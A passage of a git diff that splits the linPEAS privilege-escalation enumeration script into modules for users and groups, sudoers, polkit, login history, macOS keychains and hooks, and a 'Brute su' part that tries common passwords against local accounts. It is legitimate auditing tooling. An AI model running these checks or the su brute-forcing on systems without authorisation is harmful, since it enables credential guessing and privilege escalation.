  echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g";
 fi
 echo ""
 #-- UI) Doas
 if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then
  print_2title "Checking doas.conf"
  doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
  if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then
    cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW},"
  else echo_not_found "doas.conf"
  fi
  echo ""
 fi
 #-- UI) Pkexec policy
 print_2title "Checking Pkexec policy"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2"
 (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d"
 echo ""
 #-- UI) Superusers
 print_2title "Superusers"
 awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED},"
 echo ""
 #-- UI) Users with console
 print_2title "Users with console"
 if [ "$MACPEAS" ]; then
  dscl . list /Users | while read uname; do
    ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
    if grep -q "$ushell" /etc/shells; then #Shell user
      dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
      echo ""
    fi
  done
 else
  no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
  unexpected_shells=""
  printf "%s\n" "$no_shells" | while read f; do
    if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
      unexpected_shells="$f\n$unexpected_shells"
    fi
  done
  grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
  if [ "$unexpected_shells" ]; then
    printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
    echo "Unexpected users with shells:"
    printf "%s\n" "$unexpected_shells" | while read f; do
      if [ "$f" ]; then
        grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
      fi
    done
  fi
 fi
 echo ""
 #-- UI) All users & groups
 print_2title "All users & groups"
 if [ "$MACPEAS" ]; then
  dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
 else
  cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
 fi
 echo ""
 #-- UI) Login now
 print_2title "Login now"
 (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
 echo ""
 #-- UI) Last logons
 print_2title "Last logons"
 (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
 echo ""
 #-- UI) Login info
 print_2title "Last time logon each user"
 lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
 EXISTS_FINGER="$(command -v finger 2>/dev/null)"
 if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
  dscl . list /Users | while read uname; do
    ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
    if grep -q "$ushell" /etc/shells; then #Shell user
      finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
      echo ""
    fi
  done
 fi
 echo ""
 #-- UI) Password policy
 if [ "$EXTRA_CHECKS" ]; then
  print_2title "Password policy"
  grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
  echo ""
  if [ "$MACPEAS" ]; then
    print_2title "Relevant last user info and user configs"
    defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
    echo ""
    print_2title "Guest user status"
    sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
    sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
    sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
    echo ""
  fi
 fi
 #-- UI) Brute su
 if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then
  print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
  POSSIBE_SU_BRUTE=$(check_if_su_brute);
  if [ "$POSSIBE_SU_BRUTE" ]; then
    SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
    printf "%s\n" "$SHELLUSERS" | while read u; do
      echo "  Bruteforcing user $u..."
      su_brute_user_num "$u" $PASSTRY
    done
  else
    printf $GREEN"It's not possible to brute-force su.\n\n"$NC
  fi
 else
  print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC
 fi
 print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
--- a/linPEAS/builder/linpeas_parts/6_users_information/10_Pkexec.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/10_Pkexec.sh
@ -0,0 +1,60 @@
 # Title: Users Information - Pkexec
 # ID: UG_Pkexec
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Check Pkexec policy and related files for privilege escalation
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info
 # Global Variables: $Groups, $groupsB, $groupsVB, $nosh_usrs, $sh_usrs, $USER
 # Initial Functions:
 # Generated Global Variables: $pkexec_bin, $policy_dir, $policy_file
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "Checking Pkexec and Polkit"
 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2"
 echo ""
 print_3title "Polkit Binary"
 # Check pkexec binary
 pkexec_bin=$(command -v pkexec 2>/dev/null)
 if [ -n "$pkexec_bin" ]; then
  echo "Pkexec binary found at: $pkexec_bin" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
  if [ -u "$pkexec_bin" ]; then
    echo "Pkexec binary has SUID bit set!" | sed -${E} "s,.*,${SED_RED},g"
  fi
  ls -l "$pkexec_bin" 2>/dev/null
  # Check polkit version for known vulnerabilities
  if command -v pkexec >/dev/null 2>&1; then
    pkexec --version 2>/dev/null
  fi
 fi
 # Check polkit policies
 echo ""
 print_3title "Polkit Policies"
 for policy_dir in "/etc/polkit-1/localauthority.conf.d/" "/etc/polkit-1/rules.d/" "/usr/share/polkit-1/rules.d/"; do
  if [ -d "$policy_dir" ]; then
    echo "Checking $policy_dir:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
    if [ -w "$policy_dir" ]; then
      echo "WARNING: $policy_dir is writable!" | sed -${E} "s,.*,${SED_RED},g"
    fi
    for policy_file in "$policy_dir"/*; do
      if [ -f "$policy_file" ]; then
        if [ -w "$policy_file" ]; then
          echo "WARNING: $policy_file is writable!" | sed -${E} "s,.*,${SED_RED},g"
        fi
        cat "$policy_file" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$Groups,${SED_RED},g"
      fi
    done
  fi
 done
 # Check for polkit authentication agent
 echo ""
 print_3title "Polkit Authentication Agent"
 ps aux 2>/dev/null | grep -i "polkit" | grep -v "grep"
 echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/11_Superusers.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/11_Superusers.sh
@ -0,0 +1,37 @@
 # Title: Users Information - Superusers
 # ID: UG_Superusers
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Check for superusers and users with UID 0
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info
 # Global Variables: $knw_usrs, $nosh_usrs, $sh_usrs, $USER
 # Initial Functions:
 # Generated Global Variables: $group
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "Superusers and UID 0 Users"
 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html"
 # Check /etc/passwd for UID 0 users
 echo ""
 print_3title "Users with UID 0 in /etc/passwd"
 awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g"
 if [ command -v getent >/dev/null 2>&1 ]; then
    for group in sudo wheel adm docker lxd lxc root shadow disk video; do
        if getent group "$group" >/dev/null 2>&1; then
            echo "- Users in group '$group':"
            getent group "$group" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_RED},g"
        fi
    done
 fi
 # Check for users with sudo privileges in sudoers
 echo ""
 print_3title "Users with sudo privileges in sudoers"
 grep -v "^#" /etc/sudoers 2>/dev/null | grep -v "^$" | grep -v "^Defaults" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g"
 echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/12_Users_with_console.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/12_Users_with_console.sh
@ -0,0 +1,44 @@
 # Title: Users Information - Users with console
 # ID: UG_Users_with_console
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Users with console
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title
 # Global Variables: $MACPEAS, $sh_usrs, $USER 
 # Initial Functions:
 # Generated Global Variables: $ushell, $no_shells, $unexpected_shells
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "Users with console"
 if [ "$MACPEAS" ]; then
  dscl . list /Users | while read un; do
    ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2)
    if grep -q "$ushell" /etc/shells; then #Shell user
      dscl . -read "/Users/$un" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
      echo ""
    fi
  done
 else
  no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
  unexpected_shells=""
  printf "%s\n" "$no_shells" | while read f; do
    if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
      unexpected_shells="$f\n$unexpected_shells"
    fi
  done
  grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
  if [ "$unexpected_shells" ]; then
    printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
    echo "Unexpected users with shells:"
    printf "%s\n" "$unexpected_shells" | while read f; do
      if [ "$f" ]; then
        grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
      fi
    done
  fi
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/13_Users_groups.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/13_Users_groups.sh
@ -0,0 +1,22 @@
 # Title: Users Information - Users & groups
 # ID: UG_Users_groups
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Get all users & groups
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title
 # Global Variables: $groupsB, $groupsVB, $knw_grps, $knw_usrs, $MACPEAS, $nosh_usrs, $sh_usrs, $USER
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "All users & groups"
 if [ "$MACPEAS" ]; then
  dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
 else
  cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/14_Login_now.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/14_Login_now.sh
@ -0,0 +1,57 @@
 # Title: Users Information - Login now
 # ID: UG_Login_now
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Check currently logged in users and their sessions
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title
 # Global Variables: $knw_usrs, $nosh_usrs, $sh_usrs, $USER
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "Currently Logged in Users"
 # Check basic user information
 echo ""
 print_3title "Basic user information"
 (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
 # Check for active sessions
 echo ""
 print_3title "Active sessions"
 if command -v w >/dev/null 2>&1; then
  w 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
 fi
 # Check for logged in users via utmp
 echo ""
 print_3title "Logged in users (utmp)"
 if [ -f "/var/run/utmp" ]; then
  who -a 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
 fi
 # Check for SSH sessions
 echo ""
 print_3title "SSH sessions"
 if command -v ss >/dev/null 2>&1; then
  ss -tnp | grep ":22" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
 fi
 # Check for screen sessions
 echo ""
 print_3title "Screen sessions"
 if command -v screen >/dev/null 2>&1; then
  screen -ls 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
 fi
 # Check for tmux sessions
 echo ""
 print_3title "Tmux sessions"
 if command -v tmux >/dev/null 2>&1; then
  tmux list-sessions 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/15_Last_logons.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/15_Last_logons.sh
@ -0,0 +1,55 @@
 # Title: Users Information - Last logons
 # ID: UG_Last_logons
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Check last logons and login history
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title
 # Global Variables: $knw_usrs, $nosh_usrs, $sh_usrs, $USER
 # Initial Functions:
 # Generated Global Variables: $EXISTS_FINGER, $ushell
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "Last Logons and Login History"
 # Check last logins
 echo ""
 print_3title "Last logins"
 if command -v last >/dev/null 2>&1; then
  last -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
 fi
 # Check failed login attempts
 echo ""
 print_3title "Failed login attempts"
 if command -v lastb >/dev/null 2>&1; then
  lastb -n 20 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
 fi
 # Check auth logs for recent logins
 echo ""
 print_3title "Recent logins from auth.log (limit 20)"
 if [ -f "/var/log/auth.log" ]; then
  grep -i "login\|authentication\|accepted" /var/log/auth.log 2>/dev/null | tail -n 20 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${SED_RED},g"
 fi
 # Last time logon each user
 echo ""
 if command -v lastlog >/dev/null 2>&1; then
  print_3title "Last time logon each user"
  lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
 fi
 EXISTS_FINGER="$(command -v finger 2>/dev/null || echo -n '')"
 if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
  dscl . list /Users | while read un; do
    ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2)
    if grep -q "$ushell" /etc/shells; then #Shell user
      finger "$un" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
      echo ""
    fi
  done
 fi
 echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/17_Password_policy.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/17_Password_policy.sh
@ -0,0 +1,32 @@
 # Title: Users Information - Password policy
 # ID: UG_Password_policy
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Get assword policy
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: echo_not_found, print_2title
 # Global Variables: $EXTRA_CHECKS, $MACPEAS
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$EXTRA_CHECKS" ]; then
  print_2title "Password policy"
  grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
  echo ""
  if [ "$MACPEAS" ]; then
    print_2title "Relevant last user info and user configs"
    defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
    echo ""
    print_2title "Guest user status"
    sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
    sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
    sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
    echo ""
  fi
 fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/18_Brute_su.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/18_Brute_su.sh
@ -0,0 +1,31 @@
 # Title: Users Information - Brute su
 # ID: UG_Brute_su
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Brute su
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: check_if_su_brute, print_2title, su_brute_user_num
 # Global Variables: $IAMROOT, $PASSTRY, $TIMEOUT
 # Initial Functions:
 # Generated Global Variables: $SHELLUSERS, $POSSIBE_SU_BRUTE
 # Fat linpeas: 0
 # Small linpeas: 0
 if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then
  print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
  POSSIBE_SU_BRUTE=$(check_if_su_brute);
  if [ "$POSSIBE_SU_BRUTE" ]; then
    SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
    printf "%s\n" "$SHELLUSERS" | while read u; do
      echo "  Bruteforcing user $u..."
      su_brute_user_num "$u" $PASSTRY
    done
  else
    printf $GREEN"It's not possible to brute-force su.\n\n"$NC
  fi
 else
  print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC
 fi
 print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
--- a/linPEAS/builder/linpeas_parts/6_users_information/1_Macos_my_user_hooks.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/1_Macos_my_user_hooks.sh
@ -0,0 +1,20 @@
 # Title: Users Information - MacOS my user hooks
 # ID: UG_Macos_my_user_hooks
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Get current user Login and Logout hooks
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title
 # Global Variables: $HOME, $MACPEAS
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$MACPEAS" ];then
  print_2title "Current user Login and Logout hooks"
  defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/1_My_user.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/1_My_user.sh
@ -0,0 +1,19 @@
 # Title: Users Information - My User
 # ID: UG_My_user
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: My User
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info
 # Global Variables: $groupsB, $groupsVB, $idB, $knw_grps , $knw_usrs, $nosh_usrs,$sh_usrs, $USER
 # Initial Functions:
 # Generated Global Variables:
 # Fat linpeas: 0
 # Small linpeas: 1
 print_2title "My user"
 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users"
 (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
 echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/2_Macos_user_hooks.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/2_Macos_user_hooks.sh
@ -0,0 +1,25 @@
 # Title: Users Information - MacOS user hooks
 # ID: UG_Macos_user_hooks
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Enumerate all users login and logout hooks
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title
 # Global Variables: $MACPEAS 
 # Initial Functions:
 # Generated Global Variables: $user_home
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$MACPEAS" ];then
  print_2title "All Login and Logout hooks"
  for user_home in /Users/*/ /private/var/root/; do
    if [ -f "${user_home}Library/Preferences/com.apple.loginwindow.plist" ]; then
      echo "User: $(basename "$user_home")" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
      defaults read "${user_home}Library/Preferences/com.apple.loginwindow.plist" 2>/dev/null | grep -e "Hook" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
    fi
  done
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/6_users_information/3_Macos_keychains.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/3_Macos_keychains.sh
@ -0,0 +1,29 @@
 # Title: Users Information - MacOS Keychains
 # ID: UG_Macos_keychains
 # Author: Carlos Polop
 # Last Update: 22-08-2023
 # Description: Get macOS keychains information
 # License: GNU GPL
 # Version: 1.0
 # Functions Used: print_2title, print_info
 # Global Variables: $MACPEAS
 # Initial Functions:
 # Generated Global Variables: $user_home
 # Fat linpeas: 0
 # Small linpeas: 0
 if [ "$MACPEAS" ];then
  print_2title "Keychains"
  print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#chainbreaker"
  echo "System Keychains:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
  security list-keychains 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
  echo -e "\nUser Keychains:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
  for user_home in /Users/*/; do
    if [ -d "${user_home}Library/Keychains" ]; then
